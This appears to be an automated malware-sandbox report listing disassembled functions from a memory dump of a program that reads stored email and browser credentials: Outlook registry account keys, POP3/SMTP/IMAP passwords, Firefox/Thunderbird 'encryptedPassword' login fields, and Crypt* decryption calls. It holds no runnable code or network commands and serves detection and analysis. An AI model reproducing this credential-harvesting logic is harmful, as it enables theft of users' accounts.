                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                  • API String ID: 2238633743-192783356
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                  • API String ID: 52435246-1534328989
                                                                                                                  • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                                                  • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                  • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                                                  • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                  • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                  • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                  • CloseClipboard.USER32 ref: 00406E94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3604893535-0
                                                                                                                  • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                  • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                  • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                  • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                  • API String ID: 3963849919-1658304561
                                                                                                                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                  • String ID: (yE$(yE$(yE
                                                                                                                  • API String ID: 1865533344-362086290
                                                                                                                  • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                  • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 004431AD
                                                                                                                  • strncmp.MSVCRT ref: 004431BD
                                                                                                                  • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                  • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                  • API String ID: 1895597112-3210201812
                                                                                                                  • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                  • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                  • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                  • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                  • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                  • API String ID: 1714764973-479759155
                                                                                                                  • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                  • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                  • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                  • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040EBD8
                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                  • memset.MSVCRT ref: 0040EC2B
                                                                                                                  • memset.MSVCRT ref: 0040EC47
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                  • memset.MSVCRT ref: 0040ECDD
                                                                                                                  • memset.MSVCRT ref: 0040ECF2
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                  • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                  • memset.MSVCRT ref: 0040EDE1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                  • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                  • API String ID: 3137614212-1455797042
                                                                                                                  • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                  • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                  • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                  • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                  • API String ID: 2814039832-2206097438
                                                                                                                  • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                  • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                  • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                  • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                  • memset.MSVCRT ref: 0040E5B8
                                                                                                                  • memset.MSVCRT ref: 0040E5CD
                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                  • memset.MSVCRT ref: 0040E6B5
                                                                                                                  • memset.MSVCRT ref: 0040E6CC
                                                                                                                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                    • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                  • memset.MSVCRT ref: 0040E736
                                                                                                                  • memset.MSVCRT ref: 0040E74F
                                                                                                                  • sprintf.MSVCRT ref: 0040E76D
                                                                                                                  • sprintf.MSVCRT ref: 0040E788
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                  • memset.MSVCRT ref: 0040E858
                                                                                                                  • sprintf.MSVCRT ref: 0040E873
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                  • API String ID: 4171719235-3943159138
                                                                                                                  • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                  • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                  • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                  • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                  • GetDC.USER32 ref: 004104E2
                                                                                                                  • strlen.MSVCRT ref: 00410522
                                                                                                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                  • sprintf.MSVCRT ref: 00410640
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                  • API String ID: 1703216249-3046471546
                                                                                                                  • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                  • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                  • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                  • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004024F5
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,?,?,?,7618E430,?,00000000), ref: 00402533
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$QueryValuememset
                                                                                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                  • API String ID: 168965057-606283353
                                                                                                                  • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                  • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00402869
                                                                                                                    • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                  • _mbscpy.MSVCRT(?,?,7618E430,?,00000000), ref: 004028A3
                                                                                                                    • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7618E430,?,00000000), ref: 0040297B
                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                  • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                  • API String ID: 1497257669-167382505
                                                                                                                  • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                  • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                  • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                  • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                  APIs
                                                                                                                  • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                  • memset.MSVCRT ref: 0040FCFD
                                                                                                                  • memset.MSVCRT ref: 0040FD1D
                                                                                                                  • memset.MSVCRT ref: 0040FD3B
                                                                                                                  • memset.MSVCRT ref: 0040FD54
                                                                                                                  • memset.MSVCRT ref: 0040FD72
                                                                                                                  • memset.MSVCRT ref: 0040FD8B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                  • memset.MSVCRT ref: 0040FE45
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                  • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                  • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                  • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                  Strings
                                                                                                                  • {Unknown}, xrefs: 0040FD02
                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                  • API String ID: 1428123949-3474136107
                                                                                                                  • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
